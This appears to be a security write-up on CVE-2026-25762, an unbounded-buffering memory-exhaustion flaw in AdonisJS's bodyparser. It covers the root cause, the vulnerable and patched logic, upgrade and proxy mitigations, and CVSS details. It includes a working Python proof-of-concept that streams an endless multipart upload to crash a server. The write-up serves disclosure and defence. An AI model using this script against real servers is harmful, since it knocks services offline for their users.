Feb 8, 2026
The AdonisJS bodyparser tries to auto-detect file types by reading the start of a file stream. Before the patch, it didn't stop reading if it couldn't find a match. Attackers can send an endless stream of garbage, causing the server to buffer it all until it crashes from memory exhaustion.
A classic but devastating Denial of Service vulnerability in the AdonisJS framework's `@adonisjs/bodyparser` package. By exploiting the multipart file parser's eagerness to identify file types (magic numbers), an attacker can stream an infinite amount of data into a memory buffer that never flushes. This results in a rapid consumption of server RAM, triggering an Out-of-Memory (OOM) crash and effectively taking down the application with a single malicious POST request.
Modern web frameworks are like over-eager butlers: they want to do everything for you before you even ask. In the Node.js ecosystem, AdonisJS is one of the polished ones, offering a robust structure similar to Laravel or Rails. One of its conveniences is `@adonisjs/bodyparser`, a middleware responsible for chewing up incoming HTTP request bodies—JSON, forms, and the heavy lifter: `multipart/form-data`.
Here is the scenario: You are building a file upload feature. You want to know if the user is uploading a JPEG, a PNG, or a malicious EXE. AdonisJS, trying to be helpful, attempts to "sniff" the file stream as it comes in. It peeks at the first few bytes—the "magic numbers"—to determine the MIME type automatically.
Ideally, this only takes a few bytes (e.g., `FF D8 FF` for a JPEG). But what happens if the framework keeps reading, and reading, and reading, waiting for a magic number that never appears? You get CVE-2026-25762. It’s not a buffer overflow in the C sense (we aren't smashing the stack), but it is buffer bloat that is just as deadly for availability.
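A magic-number sniffer is conceptually just a prefix match against a signature table. Here is a minimal sketch of the idea — the `sniffMime` helper and its signature list are illustrative, not the bodyparser's actual API:

```javascript
// Map a buffer's first bytes to a MIME type via magic numbers.
const SIGNATURES = [
  { bytes: [0xff, 0xd8, 0xff], mime: 'image/jpeg' },
  { bytes: [0x89, 0x50, 0x4e, 0x47], mime: 'image/png' },
  { bytes: [0x4d, 0x5a], mime: 'application/x-msdownload' }, // 'MZ' — Windows EXE
];

function sniffMime(buffer) {
  for (const { bytes, mime } of SIGNATURES) {
    if (bytes.every((b, i) => buffer[i] === b)) return mime;
  }
  return null; // unknown — this is the case the vulnerable loop keeps waiting on
}

console.log(sniffMime(Buffer.from([0xff, 0xd8, 0xff, 0xe0]))); // image/jpeg
console.log(sniffMime(Buffer.from('AAAA'))); // null
```

The `null` branch is the interesting one: a well-behaved sniffer must decide how much input it is willing to inspect before giving up, which is exactly what the vulnerable code failed to do.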
The root cause lies in the PartHandler logic within the bodyparser. When a file part is detected in a multipart stream, the parser pauses the flow of data to the disk (or final destination) to buffer the initial chunk for inspection. This is necessary because you can't rewind a stream easily in Node.js without buffering.
The logic roughly went like this: "Buffer incoming data chunks until we recognize the file type." The fatal flaw? There was no `MAX_BUFFER_SIZE` check in that specific loop.
In a healthy request, the magic numbers appear in the first 0-4100 bytes. But in a malicious request, an attacker can send a stream that effectively looks like `/dev/urandom`—pure entropy or just zeros—forever. Because the parser code was thinking, "I haven't seen the file signature yet, better keep buffering so I don't miss it," it accumulates the attacker's stream into the Node.js heap. Since Node.js has a default memory limit (often 2GB or 4GB depending on flags), it doesn't take long for a single connection to eat it all.
While the exact upstream code isn't pasted here, we can reconstruct the vulnerability pattern from the patch analysis. The vulnerable implementation behaves like a greedy stream consumer.

```javascript
// Conceptual representation of the flaw
fileStream.on('data', (chunk) => {
  // 1. Append new data to our internal buffer
  internalBuffer = Buffer.concat([internalBuffer, chunk]);

  // 2. Try to detect the file type
  const type = detector.fromBuffer(internalBuffer);
  if (type) {
    // Success! We know what it is.
    stopBufferingAndStream(internalBuffer);
  } else {
    // 3. THE BUG: we didn't find a type, so we just wait for more data.
    // If the attacker sends 10 GB of data without a magic number,
    // 'internalBuffer' grows to 10 GB -> OOM crash.
    return;
  }
});
```

The fix is arguably simple: stop being so optimistic. If you haven't identified the file type after looking at the first ~4 KB (a standard chunk size), you aren't going to find it. The patch introduces a hard limit.
```javascript
// The patched logic
const MAX_SNIFF_SIZE = 4100; // enough for almost all magic numbers

fileStream.on('data', (chunk) => {
  internalBuffer = Buffer.concat([internalBuffer, chunk]);
  const type = detector.fromBuffer(internalBuffer);

  // MITIGATION: check whether we've exceeded the sniffing limit
  if (!type && internalBuffer.length > MAX_SNIFF_SIZE) {
    // Stop buffering. Assume generic binary or fail.
    // This caps memory usage per request to ~4 KB.
    stopBufferingAndStream(internalBuffer, 'application/octet-stream');
  }
});
```

By adding that length check, the memory usage for type detection goes from $O(n)$ (where $n$ is the attacker's stream size) to $O(1)$ (constant size).
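To convince yourself the cap really bounds memory, here is a standalone simulation of the capped sniffing loop — the `makeSniffer` helper is illustrative, not the library's API:

```javascript
// Simulate the patched loop: feed ~10 MB of unrecognizable data through a
// sniffer capped at MAX_SNIFF_SIZE and track the peak buffer size.
const MAX_SNIFF_SIZE = 4100;

function makeSniffer(detect) {
  let buffered = Buffer.alloc(0);
  let done = false;
  let peak = 0;
  return {
    push(chunk) {
      if (done) return; // decision made — later chunks stream through untouched
      buffered = Buffer.concat([buffered, chunk]);
      peak = Math.max(peak, buffered.length);
      if (detect(buffered) || buffered.length > MAX_SNIFF_SIZE) {
        done = true;                // give up: fall back to octet-stream
        buffered = Buffer.alloc(0); // flush downstream, free the memory
      }
    },
    peak: () => peak,
  };
}

// 10,000 chunks of 1 KiB of zeros — the detector never matches
const sniffer = makeSniffer(() => null);
for (let i = 0; i < 10000; i++) sniffer.push(Buffer.alloc(1024));

// Peak stays at the cap plus at most one chunk, regardless of input size
console.log(sniffer.peak() <= MAX_SNIFF_SIZE + 1024); // true
```

The same loop without the length check would have peaked at ~10 MB here, and at whatever the attacker cares to send in production.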
Exploiting this does not require advanced shellcode or heap grooming. You just need to be annoying. The goal is to keep the HTTP connection open and pour data into a single multipart field without ever sending a recognized header.
Here is how a researcher (or attacker) would script this using Python to visualize the attack vector:
```python
import time
import requests

# The target endpoint handling uploads
url = 'http://localhost:3333/upload'
boundary = 'x-oom-boundary'

def infinite_multipart():
    # Multipart preamble for a single file field named 'file'
    yield (
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="file"; filename="payload.bin"\r\n'
        'Content-Type: application/octet-stream\r\n\r\n'
    ).encode()
    # Body: endless 'A' (0x41), which is not a magic number for common files
    while True:
        yield b'A' * 1024 * 1024  # 1 MB chunks
        # Sleep slightly to keep the connection stable while RAM fills
        time.sleep(0.01)

try:
    print("[*] Initiating memory exhaustion attack...")
    # Passing a generator makes requests use chunked transfer encoding,
    # so the multipart body never ends
    requests.post(
        url,
        data=infinite_multipart(),
        headers={'Content-Type': f'multipart/form-data; boundary={boundary}'},
    )
except Exception as e:
    print(f"[!] Server likely crashed: {e}")
```

On the server side, you will see the Node.js process resident set size (RSS) climb vertically. Within seconds (depending on bandwidth), the V8 engine will hit its allocation limit and abort with `FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory`. The server restarts, dropping all other legitimate connections.
This is a high-severity Availability issue (CVSS 7.5). While it doesn't allow data theft (Confidentiality) or data tampering (Integrity), it is arguably more annoying for operations teams. A single attacker can keep a cluster of Node.js instances in a reboot loop, effectively taking the application offline.
If you are using `@adonisjs/bodyparser`, you need to upgrade immediately. The fix was backported to multiple versions. Run `npm list @adonisjs/bodyparser` to check which version you have installed, then upgrade to **10.1.3** or later (or **11.0.0-next.9** or later on the 11.x preview line).

Beyond the patch, never trust application-layer parsers blindly. Place a reverse proxy like Nginx in front of your Node.js apps and configure `client_max_body_size`. While this specific CVE exploits unbounded buffering rather than a single oversized field, a hard limit on total request body size still caps what an attacker can stream and is a mandatory first line of defense.
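As a sketch, an Nginx server block enforcing such a cap might look like this — the port and limit are illustrative, not a recommendation for your workload:

```nginx
server {
    listen 80;

    location / {
        # Reject bodies larger than 10 MB with a 413 before they reach Node
        client_max_body_size 10m;
        proxy_pass http://127.0.0.1:3333;  # assumed AdonisJS upstream
    }
}
```

Nginx counts bytes as they arrive, so the limit applies even to chunked uploads that never declare a `Content-Length`.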
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| `@adonisjs/bodyparser` (AdonisJS) | < 10.1.3 | 10.1.3 |
| `@adonisjs/bodyparser` (AdonisJS) | < 11.0.0-next.9 | 11.0.0-next.9 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS | 7.5 (High) |
| Attack Vector | Network (Remote) |
| Availability Impact | High (Service Crash) |
| Exploit Status | Trivial / PoC reproducible |
| EPSS Score | 0.00012 (Low probability of mass exploitation) |
The software does not properly restrict the size or amount of resources that are requested or influenced by an actor, which can be used to consume all available resources.